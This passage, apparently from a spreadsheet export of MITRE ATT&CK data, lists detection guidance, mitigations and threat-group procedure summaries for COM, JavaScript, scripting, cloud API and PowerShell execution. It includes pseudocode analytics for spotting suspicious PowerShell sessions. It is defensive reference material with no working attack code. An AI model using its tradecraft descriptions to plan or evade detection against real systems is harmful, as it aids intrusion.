[InvisiMole](https://attack.mitre.org/software/S0260) can use the &lt;code&gt;ITaskService&lt;/code&gt;, &lt;code&gt;ITaskDefinition&lt;/code&gt; and &lt;code&gt;ITaskSettings&lt;/code&gt; COM interfaces to schedule a task.(Citation: ESET InvisiMole June 2020)
Milan
[Milan](https://attack.mitre.org/software/S1015) can use a COM component to generate scheduled tasks.(Citation: ClearSky Siamesekitten August 2021)
Neoichor
[Neoichor](https://attack.mitre.org/software/S0691) can use the Internet Explorer (IE) COM interface to connect and receive commands from C2.(Citation: Microsoft NICKEL December 2021)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can use DCOM (targeting the 127.0.0.1 loopback address) to execute additional payloads on compromised hosts.(Citation: FireEye MuddyWater Mar 2018)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) can use the Windows COM API to schedule tasks and maintain persistence.(Citation: Eset Ramsay May 2020)
TrickBot
[TrickBot](https://attack.mitre.org/software/S0266) used COM to setup scheduled task for persistence.(Citation: ESET Trickbot Oct 2020)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) droppers have used COM objects to execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source. Monitor for execution of JXA through &lt;code&gt;osascript&lt;/code&gt; and usage of &lt;code&gt;OSAScript&lt;/code&gt; API that may be related to other suspicious behavior occurring on the system. 
Module Load
Monitor for the loading of modules associated with scripting languages (ex: JScript.dll).
Process Creation
Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts
Script Execution
Monitor for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Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [JavaScript](https://attack.mitre.org/techniques/T1059/007) scripts from executing potentially malicious downloaded content (Citation: win10_asr).
Disable or Remove Feature or Program
Turn off or restrict access to unneeded scripting components.
Execution Prevention
Denylist scripting where appropriate.
Restrict Web-Based Content
Script blocking extensions can help prevent the execution of JavaScript and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of encoded HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)
C0017
During [C0017](https://attack.mitre.org/campaigns/C0017), [APT41](https://attack.mitre.org/groups/G0096) deployed JScript web shells on compromised systems.(Citation: Mandiant APT41)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used JavaScript code.(Citation: Cylance Dust Storm)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used JavaScript for drive-by downloads and C2 communications.(Citation: Cybereason Cobalt Kitty 2017)(Citation: Volexity Ocean Lotus November 2020)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has executed JavaScript scriptlets on the victim's machine.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has manipulated legitimate websites to inject malicious JavaScript code as part of their watering hole operations.(Citation: TrendMicro EarthLusca 2022)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has used JavaScript to execute malicious code on a victim's machine.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Evilnum
[Evilnum](https://attack.mitre.org/groups/G0120) has used malicious JavaScript files on the victim's machine.(Citation: ESET EvilNum July 2020)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used malicious JavaScript to steal payment card data from e-commerce sites.(Citation: Trend Micro FIN6 October 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) used JavaScript scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) used JavaScript to execute additional files.(Citation: Malwarebytes Higaisa 2020)(Citation: Zscaler Higaisa 2020)(Citation: PTSecurity Higaisa 2020)
Indrik Spider
[Indrik Spider](https://attack.mitre.org/groups/G0119) has used malicious JavaScript files for several components of their attack.(Citation: Symantec WastedLocker June 2020)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used JScript for logging and downloading additional tools.(Citation: VirusBulletin Kimsuky October 2019)(Citation: CISA AA20-301A Kimsuky)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used JavaScript in its attacks.(Citation: MalwareBytes LazyScripter Feb 2021) 
Leafminer
[Leafminer](https://attack.mitre.org/groups/G0077) infected victims using JavaScript code.(Citation: Symantec Leafminer July 2018)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with JS, on target machines.(Citation: Kaspersky MoleRATs April 2019)	
MoustachedBouncer
[MoustachedBouncer](https://attack.mitre.org/groups/G1019) has used JavaScript to deliver malware hosted on HTML pages.(Citation: MoustachedBouncer ESET August 2023)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used JavaScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload.(Citation: ClearSky MuddyWater Nov 2018)(Citation: FireEye MuddyWater Mar 2018)(Citation: DHS CISA AA22-055A MuddyWater February 2022)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used JavaScript to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)(Citation: Rewterz Sidewinder COVID-19 June 2020)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used JS scripts.(Citation: Cyber Forensicator Silence Jan 2019)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used JavaScript for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used various JavaScript-based backdoors.(Citation: ESET Turla Mosquito Jan 2018)	
AppleSeed
[AppleSeed](https://attack.mitre.org/software/S0622) has the ability to use JavaScript to execute PowerShell.(Citation: Malwarebytes Kimsuky June 2021)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) uses JavaScript to perform its core functionalities. (Citation: Cofense Astaroth Sept 2018)(Citation: Securelist Brazilian Banking Malware July 2020)
Avaddon
[Avaddon](https://attack.mitre.org/software/S0640) has been executed through a malicious JScript downloader.(Citation: Hornet Security Avaddon June 2020)(Citation: Awake Security Avaddon)
Bundlore
[Bundlore](https://attack.mitre.org/software/S0482) can execute JavaScript by injecting it into the victim's browser.(Citation: MacKeeper Bundlore Apr 2019)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used JavaScript and Node.Js information stealer script that exfiltrates data using the node process.(Citation: Cybereason Chaes Nov 2020)
Cobalt Strike
The [Cobalt Strike](https://attack.mitre.org/software/S0154) System Profiler can use JavaScript to perform reconnaissance actions.(Citation: Talos Cobalt Strike September 2020)
DarkWatchman
[DarkWatchman](https://attack.mitre.org/software/S0673) uses JavaScript to perform its core functionalities.(Citation: Prevailion DarkWatchman 2021)
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via JavaScript or JScript.(Citation: Donut Github)	
EnvyScout
[EnvyScout](https://attack.mitre.org/software/S0634) can write files to disk with JavaScript using a modified version of the open-source tool FileSaver.(Citation: MSTIC Nobelium Toolset May 2021)
GRIFFON
[GRIFFON](https://attack.mitre.org/software/S0417) is written in and executed as [JavaScript](https://attack.mitre.org/techniques/T1059/007).(Citation: SecureList Griffon May 2019)	
InvisiMole
[InvisiMole](https://attack.mitre.org/software/S0260) can use a JavaScript file as part of its execution chain.(Citation: ESET InvisiMole June 2020)
JSS Loader
[JSS Loader](https://attack.mitre.org/software/S0648) can download and execute JavaScript files.(Citation: CrowdStrike Carbon Spider August 2021)
KONNI
[KONNI](https://attack.mitre.org/software/S0356) has executed malicious JavaScript code.(Citation: Malwarebytes Konni Aug 2021) 
KOPILUWAK
[KOPILUWAK](https://attack.mitre.org/software/S1075) had used Javascript to perform its core functions.(Citation: Mandiant Suspected Turla Campaign February 2023) 
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) includes payloads written in JavaScript.(Citation: Medium Metamorfo Apr 2020) 
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional Jscript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can use JavaScript code for execution.(Citation: ClearSky MuddyWater Nov 2018)
QakBot
The [QakBot](https://attack.mitre.org/software/S0650) web inject module can inject Java Script into web banking pages visited by the victim.(Citation: Kaspersky QakBot September 2021)(Citation: Trend Micro Black Basta October 2022)
SpicyOmelette
[SpicyOmelette](https://attack.mitre.org/software/S0646) has the ability to execute arbitrary JavaScript code on a compromised host.(Citation: Secureworks GOLD KINGSWOOD September 2018)
Valak
[Valak](https://attack.mitre.org/software/S0476) can execute JavaScript containing configuration data for establishing persistence.(Citation: Cybereason Valak May 2020)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can execute malicious JavaScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with JScript.(Citation: Kaspersky Adwind Feb 2016)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information Discovery, Collection, or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. 
Module Load
Monitor for events associated with scripting execution, such as the loading of modules associated with scripting languages (ex: JScript.dll or vbscript.dll).
Process Creation
Monitor log files for process execution through command-line and scripting activities. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
Process Metadata
Monitor contextual data about a running process, which may include information such as environment variables, image name, user/owner, or other information that may reveal abuse of system features. For example, consider monitoring for Windows Event ID (EID) 400, which shows the version of PowerShell executing in the &lt;code&gt;EngineVersion&lt;/code&gt; field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the &lt;code&gt;HostName&lt;/code&gt; field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)
Script Execution
Monitor for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Antivirus/Antimalware
Anti-virus can be used to automatically quarantine suspicious files. 
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [Visual Basic](https://attack.mitre.org/techniques/T1059/005) and [JavaScript](https://attack.mitre.org/techniques/T1059/007) scripts from executing potentially malicious downloaded content (Citation: win10_asr).
Code Signing
Where possible, only permit execution of signed scripts.
Disable or Remove Feature or Program
Disable or remove any unnecessary or unused shells or interpreters.
Execution Prevention
Use application control where appropriate. For example, PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., `Add-Type`).(Citation: Microsoft PowerShell CLM)
Privileged Account Management
When PowerShell is necessary, consider restricting PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.(Citation: Netspi PowerShell Execution Policy Bypass)
PowerShell JEA (Just Enough Administration) may also be used to sandbox administration and limit what commands admins/users can execute through remote PowerShell sessions.(Citation: Microsoft PS JEA)
Restrict Web-Based Content
Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.
Operation Spalax
For [Operation Spalax](https://attack.mitre.org/campaigns/C0005), the threat actors used Nullsoft Scriptable Install System (NSIS) scripts to install malware.(Citation: ESET Operation Spalax Jan 2021)
APT19
[APT19](https://attack.mitre.org/groups/G0073) downloaded and launched code within a SCT file.(Citation: FireEye APT19)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used COM scriptlets to download Cobalt Strike beacons.(Citation: Cybereason Cobalt Kitty 2017)	
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used Ruby scripts to execute payloads.(Citation: Volexity InkySquid RokRAT August 2021)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has utilized AutoIt and custom scripts to perform internal reconnaissance.(Citation: FireEye APT39 Jan 2019)(Citation: FBI FLASH APT39 September 2020)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used the command line for execution.(Citation: US-CERT TA18-074A)
FIN5
[FIN5](https://attack.mitre.org/groups/G0053) scans processes on all victim systems in the environment and uses automated scripts to pull back the results.(Citation: Mandiant FIN5 GrrCON Oct 2016)
FIN6
[FIN6](https://attack.mitre.org/groups/G0037) has used scripting to iterate through a list of compromised PoS systems, copy data to a log file, and remove the original data files.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) used SQL scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: FireEye FIN7 Aug 2018)
Fox Kitten
[Fox Kitten](https://attack.mitre.org/groups/G0117) has used a Perl reverse shell to communicate with C2.(Citation: ClearSky Pay2Kitten December 2020)
Ke3chang
Malware used by [Ke3chang](https://attack.mitre.org/groups/G0004) can run commands on the command-line interface.(Citation: Mandiant Operation Ke3chang November 2014)(Citation: NCC Group APT15 Alive and Strong)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used various types of scripting for execution.(Citation: FireEye APT34 Dec 2017)(Citation: OilRig ISMAgent July 2017)(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 QUADAGENT July 2018)(Citation: Unit42 OilRig Nov 2018)
Stealth Falcon
[Stealth Falcon](https://attack.mitre.org/groups/G0038) malware uses WMI to script data collection and command execution on the victim.(Citation: Citizen Lab Stealth Falcon May 2016)
Whitefly
[Whitefly](https://attack.mitre.org/groups/G0107) has used a simple remote shell tool that will call back to the C2 server and wait for commands.(Citation: Symantec Whitefly March 2019)
Windigo
[Windigo](https://attack.mitre.org/groups/G0124) has used a Perl script for information gathering.(Citation: ESET ForSSHe December 2018)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) can support commands to execute Java-based payloads.(Citation: CheckPoint Bandook Nov 2020) 
Bonadan
[Bonadan](https://attack.mitre.org/software/S0486) can create bind and reverse shells on the infected system.(Citation: ESET ForSSHe December 2018)	
CHOPSTICK
[CHOPSTICK](https://attack.mitre.org/software/S0023) is capable of performing remote command execution.(Citation: Crowdstrike DNC June 2016)(Citation: ESET Sednit Part 2)
DarkComet
[DarkComet](https://attack.mitre.org/software/S0334) can execute various types of scripts on the victim’s machine.(Citation: Malwarebytes DarkComet March 2018)
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via Ruby.(Citation: Donut Github)	
Empire
[Empire](https://attack.mitre.org/software/S0363) uses a command-line interface to interact with systems.(Citation: Github PowerShell Empire)
FIVEHANDS
[FIVEHANDS](https://attack.mitre.org/software/S0618) can receive a command line argument to limit file encryption to specified directories.(Citation: FireEye FiveHands April 2021)(Citation: NCC Group Fivehands June 2021)
Get2
[Get2](https://attack.mitre.org/software/S0460) has the ability to run executables with command-line arguments.(Citation: Proofpoint TA505 October 2019)
Imminent Monitor
[Imminent Monitor](https://attack.mitre.org/software/S0434) has a CommandPromptPacket and ScriptPacket module(s) for creating a remote shell and executing scripts.(Citation: QiAnXin APT-C-36 Feb2019)
Kessel
[Kessel](https://attack.mitre.org/software/S0487) can create a reverse shell between the infected host and a specified system.(Citation: ESET ForSSHe December 2018)	
Matryoshka
[Matryoshka](https://attack.mitre.org/software/S0167) is capable of providing Meterpreter shell access.(Citation: ClearSky Wilted Tulip July 2017)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) has been distributed through an AutoIt loader script.(Citation: Securelist Brazilian Banking Malware July 2020)
P.A.S. Webshell
[P.A.S. Webshell](https://attack.mitre.org/software/S0598) has the ability to create reverse shells with Perl scripts.(Citation: ANSSI Sandworm January 2021)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has executed a Lua script through a Lua interpreter for Windows.(Citation: Talos PoetRAT October 2020)
SpeakUp
[SpeakUp](https://attack.mitre.org/software/S0374) uses Perl scripts.(Citation: CheckPoint SpeakUp Feb 2019)
WINERACK
[WINERACK](https://attack.mitre.org/software/S0219) can create a reverse shell that utilizes statically-linked Wine cmd.exe code to emulate Windows command prompt commands.(Citation: FireEye APT37 Feb 2018)
Zeus Panda
[Zeus Panda](https://attack.mitre.org/software/S0330) can launch remote scripts on the victim’s machine.(Citation: GDATA Zeus Panda June 2017)	
gh0st RAT
[gh0st RAT](https://attack.mitre.org/software/S0032) is able to open a remote shell to execute commands.(Citation: FireEye Hacking Team)(Citation: Nccgroup Gh0st April 2018)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Consider reviewing command history in either host machines or cloud audit logs to determine if unauthorized or suspicious commands were executed.
Cloud API activity logging is typically enabled by default and may be reviewed in sources like the Microsoft Unified Audit Log, AWS CloudTrail, and GCP Admin Acitivty logs. Review these sources for history of executed API commands. Host logs may also be reviewed to capture CLI commands or PowerShell module usage to invoke Cloud API functions.
Execution Prevention
Use application control where appropriate to block use of PowerShell CmdLets or other host based resources to access cloud API resources.
Privileged Account Management
Use of proper Identity and Access Management (IAM) with Role Based Access Control (RBAC) policies to limit actions administrators can perform and provide a history of administrative actions to detect unauthorized use and abuse.
APT29
[APT29](https://attack.mitre.org/groups/G0016) has leveraged the Microsoft Graph API to perform various actions across Azure and M365 environments. They have also utilized AADInternals PowerShell Modules to access the API (Citation: MSTIC Nobelium Toolset May 2021)
TeamTNT
[TeamTNT](https://attack.mitre.org/groups/G0139) has leveraged AWS CLI to enumerate cloud environments with compromised credentials.(Citation: Talos TeamTNT)
Pacu
[Pacu](https://attack.mitre.org/software/S1091) leverages the AWS CLI for its operations.(Citation: GitHub Pacu)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Consider reviewing command history in either the console or as part of the running memory to determine if unauthorized or suspicious commands were used to modify device configuration. (Citation: Cisco IOS Software Integrity Assurance - Command History) Consider comparing a copy of the network device configuration against a known-good version to discover unauthorized changes to the command interpreter. The same process can be accomplished through a comparison of the run-time memory, though this is non-trivial and may require assistance from the vendor.
Execution Prevention
TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization. (Citation: Cisco IOS Software Integrity Assurance - TACACS)
Privileged Account Management
Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse. TACACS+ can keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization(Citation: Cisco IOS Software Integrity Assurance - AAA) (Citation: Cisco IOS Software Integrity Assurance - TACACS)
User Account Management
Use of Authentication, Authorization, and Accounting (AAA) systems will limit actions users can perform and provide a history of user actions to detect unauthorized use and abuse. Ensure least privilege principles are applied to user accounts and groups so that only authorized users can perform configuration changes. (Citation: Cisco IOS Software Integrity Assurance - AAA)
</t>
  </si>
  <si>
    <t>Command Execution
If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.
Module Load
Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)
&lt;h4&gt; Analytic 1 - Processes loading PowerShell assemblies&lt;/h4&gt;
&lt;code&gt;suspicious_processes = filter ProcessGuid, ProcessFilePath, ModulePath, FileDescription where
  EventId == "7"
  AND
  (ModulePath LIKE '%system.management.automation%' OR
   FileDescription LIKE '%system.management.automation%')&lt;/code&gt;
Process Creation
Monitor for newly executed processes that may abuse PowerShell commands and scripts for execution.
Note: Event IDs are for Sysmon (Event ID 10 - process access) and Windows Security Log (Event ID 4688 - a new process has been created). 
- The logic for Analytic 1 is based around detecting on non-interactive Powershell sessions (i.e., those not launched by a user through explorer.exe). This may lead to false positives when used in a production environment, so we recommend tuning any such analytics by including additional logic (e.g., looking for suspicious parent processes) that helps filter such events.
- The logic for Analytic 2 is based around detecting on remote Powershell sessions. PowerShell can be used over WinRM to remotely run commands on a host. When a remote PowerShell session starts, svchost.exe executes wsmprovhost.exe.
&lt;h4&gt;Analytic 1- Non-interactive Powershell Sessions&lt;/h4&gt;
&lt;code&gt;processes = filter process where ((event_id="10" OR event_id="4688") AND exe == "powershell.exe" AND parent_exe != "explorer.exe")&lt;/code&gt;
&lt;h4&gt;Analytic 2- Remote Powershell Sessions&lt;/h4&gt;
&lt;code&gt;processes = filter process where ((event_id="10" OR event_id="4688") AND exe == "wsmprovhost.exe" and parent_exe == "svchost.exe")&lt;/code&gt;
Process Metadata
Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the &lt;code&gt;EngineVersion&lt;/code&gt; field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the &lt;code&gt;HostName&lt;/code&gt; field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)
Script Execution
Monitor for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Antivirus/Antimalware
Anti-virus can be used to automatically quarantine suspicious files. 
Code Signing
Set PowerShell execution policy to execute only signed scripts.
Disable or Remove Feature or Program
It may be possible to remove PowerShell from systems when not needed, but a review should be performed to assess the impact to an environment, since it could be in use for many legitimate purposes and administrative functions.
Disable/restrict the WinRM Service to help prevent uses of PowerShell for remote execution.
Execution Prevention
Use application control where appropriate. PowerShell Constrained Language mode can be used to restrict access to sensitive or otherwise dangerous language elements such as those used to execute arbitrary Windows APIs or files (e.g., `Add-Type`).(Citation: Microsoft PowerShell CLM)
Privileged Account Management
When PowerShell is necessary, consider restricting PowerShell execution policy to administrators. Be aware that there are methods of bypassing the PowerShell execution policy, depending on environment configuration.(Citation: Netspi PowerShell Execution Policy Bypass)
PowerShell JEA (Just Enough Administration) may also be used to sandbox administration and limit what commands admins/users can execute through remote PowerShell sessions.(Citation: Microsoft PS JEA)
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) used PowerShell scripts to run a credential harvesting tool in memory to evade defenses.(Citation: Dragos Crashoverride 2018)
C0018
During [C0018](https://attack.mitre.org/campaigns/C0018), the threat actors used encoded PowerShell scripts for execution.(Citation: Cisco Talos Avos Jun 2022)(Citation: Costa AvosLocker May 2022)
C0021
During [C0021](https://attack.mitre.org/campaigns/C0021), the threat actors used obfuscated PowerShell to extract an encoded payload from within an .LNK file.(Citation: FireEye APT29 Nov 2018)(Citation: Microsoft Unidentified Dec 2018)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used PowerShell to run a series of Base64-encoded commands that acted as a stager and enumerated hosts.(Citation: Talos Frankenstein June 2019)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) used PowerShell commands to explore the environment of compromised victims.(Citation: ESET Lazarus Jun 2020)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used PowerShell on compromised systems.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
During the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) used PowerShell to create new tasks on remote machines, identify configuration settings, exfiltrate data, and execute other commands.(Citation: Volexity SolarWinds)(Citation: Microsoft Analyzing Solorigate Dec 2020)(Citation: CrowdStrike StellarParticle January 2022)
APT19
[APT19](https://attack.mitre.org/groups/G0073) used PowerShell commands to execute payloads.(Citation: FireEye APT19)
APT28
[APT28](https://attack.mitre.org/groups/G0007) downloads and executes PowerShell scripts and performs PowerShell commands.(Citation: Palo Alto Sofacy 06-2018)(Citation: TrendMicro Pawn Storm Dec 2020)(Citation: Cybersecurity Advisory GRU Brute Force Campaign July 2021)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used encoded PowerShell scripts uploaded to [CozyCar](https://attack.mitre.org/software/S0046) installations to download and install [SeaDuke](https://attack.mitre.org/software/S0053).(Citation: Symantec Seaduke 2015)(Citation: Mandiant No Easy Breach)(Citation: ESET T3 Threat Report 2021)(Citation: Secureworks IRON HEMLOCK Profile)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has used PowerShell on victim systems to download and run payloads after exploitation.(Citation: FireEye Operation Double Tap)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution.(Citation: FireEye APT32 May 2017)(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has utilized PowerShell to download files from the C2 server and run various scripts. (Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used PowerShell to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has used PowerShell to execute malicious code.(Citation: BitDefender Chafer May 2020)(Citation: Symantec Chafer February 2018)
APT41
[APT41](https://attack.mitre.org/groups/G0096) leveraged PowerShell to deploy malware families in victims’ environments.(Citation: FireEye APT41 Aug 2019)(Citation: FireEye APT41 March 2020)
Aquatic Panda
[Aquatic Panda](https://attack.mitre.org/groups/G0143) has downloaded additional scripts and executed Base64 encoded commands in PowerShell.(Citation: CrowdStrike AQUATIC PANDA December 2021)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used PowerShell for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)
Blue Mockingbird
[Blue Mockingbird](https://attack.mitre.org/groups/G0108) has used PowerShell reverse TCP shells to issue interactive commands over a network connection.(Citation: RedCanary Mockingbird May 2020)
Chimera
[Chimera](https://attack.mitre.org/groups/G0114) has used PowerShell scripts to execute malicious payloads and the DSInternals PowerShell module to make use of Active Directory features.(Citation: Cycraft Chimera April 2020)(Citation: NCC Group Chimera January 2021)	
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has used powershell.exe to download and execute scripts.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: PTSecurity Cobalt Dec 2016)(Citation: Group IB Cobalt Aug 2017)(Citation: RiskIQ Cobalt Jan 2018)(Citation: TrendMicro Cobalt Group Nov 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used PowerShell to execute malicious files and payloads.(Citation: TrendMicro Confucius APT Aug 2021)
CopyKittens
[CopyKittens](https://attack.mitre.org/groups/G0052) has used PowerShell Empire.(Citation: ClearSky Wilted Tulip July 2017)
DarkHydrus
[DarkHydrus](https://attack.mitre.org/groups/G0079) leveraged PowerShell to download and execute additional scripts for execution.(Citation: Unit 42 DarkHydrus July 2018)(Citation: Unit 42 Playbook Dec 2017)
DarkVishnya
[DarkVishnya](https://attack.mitre.org/groups/G0105) used PowerShell to create shellcode loaders.(Citation: Securelist DarkVishnya Dec 2018)
Deep Panda
[Deep Panda](https://attack.mitre.org/groups/G0009) has used PowerShell scripts to download and execute programs in memory, without writing to disk.(Citation: Alperovitch 2014)
Dragonfly
[Dragonfly](https://attack.mitre.org/groups/G0035) has used PowerShell scripts for execution.(Citation: US-CERT TA18-074A)(Citation: Symantec Dragonfly Sept 2017)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) has used PowerShell to execute commands.(Citation: TrendMicro EarthLusca 2022)
Ember Bear
[Ember Bear](https://attack.mitre.org/groups/G1003) has used PowerShell to download and execute malicious code.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
FIN10
[FIN10](https://attack.mitre.org/groups/G0051) uses PowerShell for execution as well as PowerShell Empire to establish persistence.(Citation: FireEye FIN10 June 2017)(Citation: Github PowerShell Empire)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used PowerShell commands to obtain DNS data from a compromised network.(Citation: Mandiant FIN13 Aug 2022)
FIN6
 [FIN6](https://attack.mitre.org/groups/G0037) has used PowerShell to gain access to merchant's networks, and a Metasploit PowerShell module to download and execute shellcode and to set up a local listener.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)(Citation: Visa FIN6 Feb 2019)
FIN7
